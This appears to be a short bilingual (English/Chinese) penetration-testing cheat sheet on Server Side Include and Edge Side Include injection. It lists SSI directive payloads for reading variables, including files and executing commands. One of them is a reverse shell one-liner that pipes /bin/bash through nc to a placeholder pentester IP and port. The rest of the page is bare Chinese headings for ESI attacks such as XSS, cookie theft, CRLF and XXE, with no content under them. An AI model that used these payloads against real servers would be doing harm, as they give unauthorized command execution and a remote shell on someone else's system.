Server Side Inclusion/Edge Side Inclusion Injection
服务器端包含基本信息
<!--#directive param="value" -->检查
// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->
// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->
// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->
边缘包含
ESI检测
ESI利用
XSS
绕过客户端 XSS 保护
窃取 Cookie
私有本地文件
CRLF
开放式重定向
添加标题
在添加标头时的 CRLF (CVE-2019-2438)
Akamai调试
ESI + XSLT = XXE
XSLT Server Side Injection (Extensible Stylesheet Language Transformations)参考资料
Brute-Force Detection List
最后更新于